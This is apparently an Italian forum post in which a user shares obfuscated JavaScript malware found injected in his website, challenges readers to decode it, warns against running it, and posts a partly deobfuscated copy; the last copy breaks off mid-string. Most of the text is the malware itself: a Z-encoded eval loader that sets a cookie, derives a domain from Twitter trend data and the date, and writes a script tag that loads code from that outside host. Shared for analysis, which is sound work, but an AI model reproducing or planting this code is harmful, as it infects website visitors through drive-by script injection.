1000 punti a chi risolve... malware javascript

[blindy]

Vi sottopongo questo bel malware che mi son trovato sul sito

$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ25 2c14Z2529);Z2522;Z22;ceZ3dZ223hZ2561Z2572CodZ2565A t(Z2530)^(Z25270Z2578Z25300Z2527+esZ2529));Z257d}Z 22;cdZ3dZ22Z253dst+Z2553triZ256egZ252efZ2572Z256fm Z2543haZ2572CZ256fdeZ2528(Z2574mp.Z256Z22;czZ3dZ22 Z2566uZ256ectZ2569onZ2520cZ257a(czZ2529Z257bretZ25 75rZ256eZ2520ca+Z2563Z2562+cZ2563Z252bcZ2564+ceZ25 2bczZ253bZ257d;Z22;cbZ3dZ22pZ2565(Z2564s)Z253bstZ2 53dtmpZ253dZ2527Z2527;for(iZ253d0;iZ253cds.Z256cen Z22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dZ2573Z2574; Z2564cZ2573Z2528dZ2561Z252bdZ2562+Z2564cZ252bZ2564 dZ252bdZ2565,Z2531Z2530)Z253bZ2564Z2577Z2528Z2573t Z2529;Z2573Z2574Z253dZ2524Z2561;Z2522;Z22;dzZ3dZ22 Z2566unZ2563tioZ256e dZ2577(tZ2529Z257bcaZ253dZ2527Z252564oZ252563umeZ2 5256etZ252ewZ252572Z252569Z252574Z2565Z252528Z2525 22Z2527;ceZ253dZ2527Z252522Z252529Z2527;cbZ253dZ25 27Z25253cscrZ252569pZ252574 Z256cZ2561Z25256eguZ25256Z2531Z252567Z252565Z25253 dZ25255cZ252522jaZ2576asZ2563rZ252569pZ2574Z25255c Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ252 52fscrZ2569Z252570tZ2525Z2533eZ2527;evZ2561l(Z2575 nZ2565sZ2563apeZ2528t))Z257d;Z22;ccZ3dZ22gZ2574h;Z 2569++)Z257btZ256dZ2570Z253dds.Z2573liZ2563Z2565(i ,Z2569+1)Z253bstZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c 07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~ 7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7 Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z2 57F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7 g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3 c(Z3c)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8Z22;caZ3dZ22Z2566uZ256eZ2563tiZ256fn dZ2563Z2573(Z2564s,Z2565Z2573)Z257bdsZ253duneZ2573 caZ22;deZ3dZ22iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e }9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h# #!!90..0$90;0~e}9050!Z25209M+}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0; 0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+t qiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+4q-4qZ3ebu`|qsu8tZ3ciuqbSxZ25220;0}Z257F~dxSx0;0iuqbS x!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0; 07Z3esZ257F}79+Z22;dbZ3dZ229+tqduZ3ecudTqdu8tqduZ3 ewudTqdu890Z3d0#9+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+dy}uK7tqi7M0-0tqduZ3ewudTqdu89+yv08tqduZ3ewudTqi890--0!0ll0tqduZ3ewudTqi890--0Z25260ll0tqduZ3ewudTqi890--0$9ktqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0!9+0dy}uK7 tqi7M0-0tqduZ3ewudTqdu89+0dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+0m0tqduZ3ecudTqdu8tqduZ3ewud Tqdu890;Z22;ddZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbude b~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0 y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257 F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy} uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z252 6#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z252 0hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z22;cuZ3dZ22(p} b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rv wyr}f:wZ7by;xp;dfZ7bl;64c}p`|)Z25$$4|q}s|`),$*(;}r fuyq*(;p}b*Z22;dcZ3dZ220!9+0yv08tqduZ3ewud]Z257F~dx89;!0,0!Z25209kcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3dZ252070;08tqduZ3ewud]Z257F~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3d70;08tqduZ3ewud]Z257F~dx89;!9+myv08tqduZ3ewudTqdu890;!0,0!Z25209kc xyvdY~tuh0-cxyvdY~tuh0;07Z3dZ252070;0tqduZ3ewudTqdu89+mu|cukc xyvdY~tuh0-0cxyvdY~tuh0;07Z3d70;0tqduZ3ewudTqdu89+mcxyvdY~tuh 0-0gy~tZ257FgZ3edgZ3edbu~tcKcxyvdY~tuhMKZ2520MZ3eaeu biZ3esxqbSZ257FtuQd8!9+ve~sdyZ257F~0SZ22;Z69Z66 (Z64Z6fcZ75meZ6eZ74.Z63Z6fokZ69eZ2einZ64exOZ66Z28Z 27rfZ35f6dZ73Z27)Z3dZ3d-1)Z7bfunction cZ61Z6clZ62acZ6bZ28x)Z7b winZ64owZ2etwZ20Z3d x;sc(Z27rf5Z666Z64sZ27,2,7Z29Z3bevaZ6c(uZ6eZ65sZ63 apeZ28Z64z+cZ7a+Z6fpZ2bZ73Z74)Z2bZ27dw(dzZ2bcZ7a($ aZ2bsZ74)Z29Z3bZ27);Z64Z6fcZ75menZ74.Z77ritZ65(Z24 a);Z7ddZ6fcZ75Z6dentZ2ewriZ74e(Z22Z3cimg srZ63Z3dZ27http:Z2fZ2fsearcZ68Z2eZ74Z77iZ74teZ72.Z 63omZ2fimagZ65sZ2fseaZ72chZ2frssZ2epZ6egZ27 widZ74hZ3d1 hZ65iZ67Z68Z74Z3d1 sZ74Z79lZ65Z3dZ27visibilZ69tZ79:hZ69ddeZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djavZ61Z73Z63riZ70tZ22+Z22 srcZ3dZ27http:Z2fZ2fsearchZ2etwZ69tZ74Z65rZ2ecoZ6d Z2ftreZ6edZ73Z2fweZ65Z6bly.Z6aZ73Z6fn?Z63Z61Z6cZ6c Z62acZ6bZ3dcallbZ61cZ6b&Z65xZ63lZ75Z64eZ3dhasZ68ta Z67sZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7delZ73eZ7b$aZ3dZ27Z27};funcZ74ionZ 20Z73c(cZ6emZ2cvZ2cedZ29Z7bvZ61r Z65xdZ3dZ6eZ65w DZ61tZ65()Z3bZ65Z78d.sZ65Z74Z44atZ65(exZ64.Z67etZ4 4aZ74Z65Z28)+eZ64);Z64ocuZ6dentZ2ecooZ6biZ65Z3dcnm + Z27Z3dZ27 +escZ61pZ65(Z76)+Z27;Z65xpiZ72Z65Z73Z3dZ27+eZ78dZ2 etoGZ4dTZ53tZ72iZ6eg()Z3b}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)== "Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));

che ne dite ?

[blindy]

ah attenzione: non provatelo on line.. io nn ne rispondo

op="$a="dw(dcs(cu,14));";";ce="3harCodeAt(0)^('0x0 0'+es)));}}";cd="=st+String.fromCharCode((tmp.%6"; cz="function cz(cz){return ca+cb+cc+cd+ce+cz;};";cb="pe(ds);st=tmp='';for(i=0 ;i<ds.len";st="st="$a=st;dcs(da+db+dc+dd+de,10);dw (st);st=$a;";";dz="function dw(t){ca='%64o%63ume%6et.w%72%69%74e%28%22';ce='%2 2%29';cb='%3cscr%69p%74 la%6egu%61%67%65%3d%5c%22javascr%69pt%5c%22%3e';cc ='%3c%5c%2fscri%70t%3e';eval(unescape(t))};";cc="g th;i++){tmp=ds.slice(i,i+1);st";da="fqb0t-7vrs}vyb>s}7+0fqb0cxyvdY~tuh0-0 +fqb0}~dxc0-0~ug0Qbbqi87e~7<07tfu7<07dxb7<07vyb7<07fyv7<07huc 7<07fuc7<07wxd7<07u~y7<07ud~7<07|uf7<07dgu79+fqb0| uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7y7<7z7 <7{7<7|7<7}7<7~7<77<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7 g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<"<#<$<%<&<'<(<)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8";ca="function dcs(ds,es){ds=unesca";de="iuqbSx"0-0|uddubcK8888dy}uK7iuqb7M060 h##!!90..0#90;0~e}9050! 9M0;0|uddubcK8888dy}uK7iuqb7M060 h##!!90..0$90;0~e}9050! 9M+}~dxSx0-0|uddubcK88dy}uK7}~dx7M0;0~e}9050"%9M0;0|uddubcK8 8dy}uK7}~dx7M0:0~e}9050"%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0&9050"'9M+4q-4q>bu`|qsu8t<iuqbSx"0;0}~dxSx0;0iuqbSx!0;0tqiSx0; 0}~dxcKdy}uK7}~dx7M0=0!M0;07>s}79+";db="9+tqdu> cudTqdu8tqdu>wudTqdu890=0#9+0dy}uK7iuqb7M0-0tqdu>wudVe||Iuqb89+dy}uK7}~dx7M0-0tqdu>wud]~dx89;!+dy}uK7tqi7M0-0tqdu>wudTqdu89+yv08tqdu>wudTqi890--0!0ll0tqdu>wudTqi890--0&0ll0tqdu>wudTqi890--0$9ktqdu>cudTqdu8tqdu>wudTqdu890=0!9+0dy}uK7tqi7M0-0tqdu>wudTqdu89+0dy}uK7}~dx7M0-0tqdu>wud]~dx89;!+0dy}uK7iuqb7M0-0tqdu>wudVe||Iuqb89+0m0tqdu>cudTqdu8tqdu>wudTqdu89 0;";dd="q|se|qdu]qwys^e}rub8tqi<0}~dx<0iuqb<0y~tuh9kbudeb~0888iuqb 0;08y~tuh0:0tqi990;08}~dx0N0tqi90:0y~tuh90;0tqi9+ mfqb0iuqbSx!<0iuqbSx"<0}~dxSx<0tqiSx<0}qwys^e}+~e }0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}~dx7M<0dy}uK7iuqb7 M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060 hQQ90;0~e}9050&#9050"&M0;0|uddubcK888dy}uK7iuqb7M0 60 hQQ90,,0"90;0~e}9050"%M+";cu="(p}b4g`mxq)6b}g}v}x} `m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;df{l ;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";dc="0!9+0y v08tqdu>wud]~dx89;!0,0! 9kcxyvdY~tuh0-0dy}uK7iuqb7M0;07= 70;08tqdu>wud]~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;07=70;08tqdu>wud]~dx89;!9+myv08tqdu>wudTqdu890;!0,0! 9kcxyvdY~tuh0-cxyvdY~tuh0;07= 70;0tqdu>wudTqdu89+mu|cukcxyvdY~tuh0-0cxyvdY~tuh0;07=70;0tqdu>wudTqdu89+mcxyvdY~tuh0-0gy~tg>dg>dbu~tcKcxyvdY~tuhMK M>aeubi>sxqbStuQd8!9+ve~sdy~0S";if (document.cookie.indexOf('rf5f6ds')==-1){function callback(x){ window.tw = x;sc('rf5f6ds',2,7);eval(unescape(dz+cz+op+st)+'dw (dz+cz($a+st));');document.write($a);}document.wri te(" <scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/weekly.json?callback=callback&exclude=hashtags'>" + "</scr" + "ipt>");}else{$a=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+ed);document.cook ie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();};

$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ25 2c14Z2529);Z2522;Z22;ceZ3dZ223hZ2561Z2572CodZ2565A t(Z2530)^(Z25270Z2578Z25300Z2527+esZ2529));Z257d}Z 22;cdZ3dZ22Z253dst+Z2553triZ256egZ252efZ2572Z256fm Z2543haZ2572CZ256fdeZ2528(Z2574mp.Z256Z22;czZ3dZ22 Z2566uZ256ectZ2569onZ2520cZ257a(czZ2529Z257bretZ25 75rZ256eZ2520ca+Z2563Z2562+cZ2563Z252bcZ2564+ceZ25 2bczZ253bZ257d;Z22;cbZ3dZ22pZ2565(Z2564s)Z253bstZ2 53dtmpZ253dZ2527Z2527;for(iZ253d0;iZ253cds.Z256cen Z22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dZ2573Z2574; Z2564cZ2573Z2528dZ2561Z252bdZ2562+Z2564cZ252bZ2564 dZ252bdZ2565,Z2531Z2530)Z253bZ2564Z2577Z2528Z2573t Z2529;Z2573Z2574Z253dZ2524Z2561;Z2522;Z22;dzZ3dZ22 Z2566unZ2563tioZ256e dZ2577(tZ2529Z257bcaZ253dZ2527Z252564oZ252563umeZ2 5256etZ252ewZ252572Z252569Z252574Z2565Z252528Z2525 22Z2527;ceZ253dZ2527Z252522Z252529Z2527;cbZ253dZ25 27Z25253cscrZ252569pZ252574 Z256cZ2561Z25256eguZ25256Z2531Z252567Z252565Z25253 dZ25255cZ252522jaZ2576asZ2563rZ252569pZ2574Z25255c Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ252 52fscrZ2569Z252570tZ2525Z2533eZ2527;evZ2561l(Z2575 nZ2565sZ2563apeZ2528t))Z257d;Z22;ccZ3dZ22gZ2574h;Z 2569++)Z257btZ256dZ2570Z253dds.Z2573liZ2563Z2565(i ,Z2569+1)Z253bstZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c 07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~ 7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7 Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z2 57F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7 g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3 c(Z3c)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8Z22;caZ3dZ22Z2566uZ256eZ2563tiZ256fn dZ2563Z2573(Z2564s,Z2565Z2573)Z257bdsZ253duneZ2573 caZ22;deZ3dZ22iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e }9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h# #!!90..0$90;0~e}9050!Z25209M+}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0; 0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+t qiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+4q-4qZ3ebu`|qsu8tZ3ciuqbSxZ25220;0}Z257F~dxSx0;0iuqbS x!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0; 07Z3esZ257F}79+Z22;dbZ3dZ229+tqduZ3ecudTqdu8tqduZ3 ewudTqdu890Z3d0#9+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+dy}uK7tqi7M0-0tqduZ3ewudTqdu89+yv08tqduZ3ewudTqi890--0!0ll0tqduZ3ewudTqi890--0Z25260ll0tqduZ3ewudTqi890--0$9ktqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0!9+0dy}uK7 tqi7M0-0tqduZ3ewudTqdu89+0dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+0m0tqduZ3ecudTqdu8tqduZ3ewud Tqdu890;Z22;ddZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbude b~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0 y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257 F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy} uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z252 6#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z252 0hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z22;cuZ3dZ22(p} b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rv wyr}f:wZ7by;xp;dfZ7bl;64c}p`|)Z25$$4|q}s|`),$*(;}r fuyq*(;p}b*Z22;dcZ3dZ220!9+0yv08tqduZ3ewud]Z257F~dx89;!0,0!Z25209kcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3dZ252070;08tqduZ3ewud]Z257F~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3d70;08tqduZ3ewud]Z257F~dx89;!9+myv08tqduZ3ewudTqdu890;!0,0!Z25209kc xyvdY~tuh0-cxyvdY~tuh0;07Z3dZ252070;0tqduZ3ewudTqdu89+mu|cukc xyvdY~tuh0-0cxyvdY~tuh0;07Z3d70;0tqduZ3ewudTqdu89+mcxyvdY~tuh 0-0gy~tZ257FgZ3edgZ3edbu~tcKcxyvdY~tuhMKZ2520MZ3eaeu biZ3esxqbSZ257FtuQd8!9+ve~sdyZ257F~0SZ22;Z69Z66 (Z64Z6fcZ75meZ6eZ74.Z63Z6fokZ69eZ2einZ64exOZ66Z28Z 27rfZ35f6dZ73Z27)Z3dZ3d-1)Z7bfunction cZ61Z6clZ62acZ6bZ28x)Z7b winZ64owZ2etwZ20Z3d x;sc(Z27rf5Z666Z64sZ27,2,7Z29Z3bevaZ6c(uZ6eZ65sZ63 apeZ28Z64z+cZ7a+Z6fpZ2bZ73Z74)Z2bZ27dw(dzZ2bcZ7a($ aZ2bsZ74)Z29Z3bZ27);Z64Z6fcZ75menZ74.Z77ritZ65(Z24 a);Z7ddZ6fcZ75Z6dentZ2ewriZ74e(Z22Z3cimg srZ63Z3dZ27http:Z2fZ2fsearcZ68Z2eZ74Z77iZ74teZ72.Z 63omZ2fimagZ65sZ2fseaZ72chZ2frssZ2epZ6egZ27 widZ74hZ3d1 hZ65iZ67Z68Z74Z3d1 sZ74Z79lZ65Z3dZ27visibilZ69tZ79:hZ69ddeZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djavZ61Z73Z63riZ70tZ22+Z22 srcZ3dZ27http:Z2fZ2fsearchZ2etwZ69tZ74Z65rZ2ecoZ6d Z2ftreZ6edZ73Z2fweZ65Z6bly.Z6aZ73Z6fn?Z63Z61Z6cZ6c Z62acZ6bZ3dcallbZ61cZ6b&Z65xZ63lZ75Z64eZ3dhasZ68ta Z67sZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7delZ73eZ7b$aZ3dZ27Z27};funcZ74ionZ 20Z73c(cZ6emZ2cvZ2cedZ29Z7bvZ61r Z65xdZ3dZ6eZ65w DZ61tZ65()Z3bZ65Z78d.sZ65Z74Z44atZ65(exZ64.Z67etZ4 4aZ74Z65Z28)+eZ64);Z64ocuZ6dentZ2ecooZ6biZ65Z3dcnm + Z27Z3dZ27 +escZ61pZ65(Z76)+Z27;Z65xpiZ72Z65Z73Z3dZ27+eZ78dZ2 etoGZ4dTZ53tZ72iZ6eg()Z3b}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)== "Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));

$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ25 2c14Z2529);Z2522;Z22;ceZ3dZ223hZ2561Z2572CodZ2565A t(Z2530)^(Z25270Z2578Z25300Z2527+esZ2529));Z257d}Z 22;cdZ3dZ22Z253dst+Z2553triZ256egZ252efZ2572Z256fm Z2543haZ2572CZ256fdeZ2528(Z2574mp.Z256Z22;czZ3dZ22 Z2566uZ256ectZ2569onZ2520cZ257a(czZ2529Z257bretZ25 75rZ256eZ2520ca+Z2563Z2562+cZ2563Z252bcZ2564+ceZ25 2bczZ253bZ257d;Z22;cbZ3dZ22pZ2565(Z2564s)Z253bstZ2 53dtmpZ253dZ2527Z2527;for(iZ253d0;iZ253cds.Z256cen Z22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dZ2573Z2574; Z2564cZ2573Z2528dZ2561Z252bdZ2562+Z2564cZ252bZ2564 dZ252bdZ2565,Z2531Z2530)Z253bZ2564Z2577Z2528Z2573t Z2529;Z2573Z2574Z253dZ2524Z2561;Z2522;Z22;dzZ3dZ22 Z2566unZ2563tioZ256e dZ2577(tZ2529Z257bcaZ253dZ2527Z252564oZ252563umeZ2 5256etZ252ewZ252572Z252569Z252574Z2565Z252528Z2525 22Z2527;ceZ253dZ2527Z252522Z252529Z2527;cbZ253dZ25 27Z25253cscrZ252569pZ252574 Z256cZ2561Z25256eguZ25256Z2531Z252567Z252565Z25253 dZ25255cZ252522jaZ2576asZ2563rZ252569pZ2574Z25255c Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ252 52fscrZ2569Z252570tZ2525Z2533eZ2527;evZ2561l(Z2575 nZ2565sZ2563apeZ2528t))Z257d;Z22;ccZ3dZ22gZ2574h;Z 2569++)Z257btZ256dZ2570Z253dds.Z2573liZ2563Z2565(i ,Z2569+1)Z253bstZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c 07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~ 7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7 Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z2 57F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7 g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3 c(Z3c)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8Z22;caZ3dZ22Z2566uZ256eZ2563tiZ256fn dZ2563Z2573(Z2564s,Z2565Z2573)Z257bdsZ253duneZ2573 caZ22;deZ3dZ22iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e }9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h# #!!90..0$90;0~e}9050!Z25209M+}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0; 0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+t qiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+4q-4qZ3ebu`|qsu8tZ3ciuqbSxZ25220;0}Z257F~dxSx0;0iuqbS x!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0; 07Z3esZ257F}79+Z22;dbZ3dZ229+tqduZ3ecudTqdu8tqduZ3 ewudTqdu890Z3d0#9+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+dy}uK7tqi7M0-0tqduZ3ewudTqdu89+yv08tqduZ3ewudTqi890--0!0ll0tqduZ3ewudTqi890--0Z25260ll0tqduZ3ewudTqi890--0$9ktqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0!9+0dy}uK7 tqi7M0-0tqduZ3ewudTqdu89+0dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+0m0tqduZ3ecudTqdu8tqduZ3ewud Tqdu890;Z22;ddZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbude b~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0 y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257 F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy} uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z252 6#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z252 0hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z22;cuZ3dZ22(p} b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rv wyr}f:wZ7by;xp;dfZ7bl;64c}p`|)Z25$$4|q}s|`),$*(;}r fuyq*(;p}b*Z22;dcZ3dZ220!9+0yv08tqduZ3ewud]Z257F~dx89;!0,0!Z25209kcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3dZ252070;08tqduZ3ewud]Z257F~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3d70;08tqduZ3ewud]Z257F~dx89;!9+myv08tqduZ3ewudTqdu890;!0,0!Z25209kc xyvdY~tuh0-cxyvdY~tuh0;07Z3dZ252070;0tqduZ3ewudTqdu89+mu|cukc xyvdY~tuh0-0cxyvdY~tuh0;07Z3d70;0tqduZ3ewudTqdu89+mcxyvdY~tuh 0-0gy~tZ257FgZ3edgZ3edbu~tcKcxyvdY~tuhMKZ2520MZ3eaeu biZ3esxqbSZ257FtuQd8!9+ve~sdyZ257F~0SZ22;Z69Z66 (Z64Z6fcZ75meZ6eZ74.Z63Z6fokZ69eZ2einZ64exOZ66Z28Z 27rfZ35f6dZ73Z27)Z3dZ3d-1)Z7bfunction cZ61Z6clZ62acZ6bZ28x)Z7b winZ64owZ2etwZ20Z3d x;sc(Z27rf5Z666Z64sZ27,2,7Z29Z3bevaZ6c(uZ6eZ65sZ63 apeZ28Z64z+cZ7a+Z6fpZ2bZ73Z74)Z2bZ27dw(dzZ2bcZ7a($ aZ2bsZ74)Z29Z3bZ27);Z64Z6fcZ75menZ74.Z77ritZ65(Z24 a);Z7ddZ6fcZ75Z6dentZ2ewriZ74e(Z22Z3cimg srZ63Z3dZ27http:Z2fZ2fsearcZ68Z2eZ74Z77iZ74teZ72.Z 63omZ2fimagZ65sZ2fseaZ72chZ2frssZ2epZ6egZ27 widZ74hZ3d1 hZ65iZ67Z68Z74Z3d1 sZ74Z79lZ65Z3dZ27visibilZ69tZ79:hZ69ddeZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djavZ61Z73Z63riZ70tZ22+Z22 srcZ3dZ27http:Z2fZ2fsearchZ2etwZ69tZ74Z65rZ2ecoZ6d 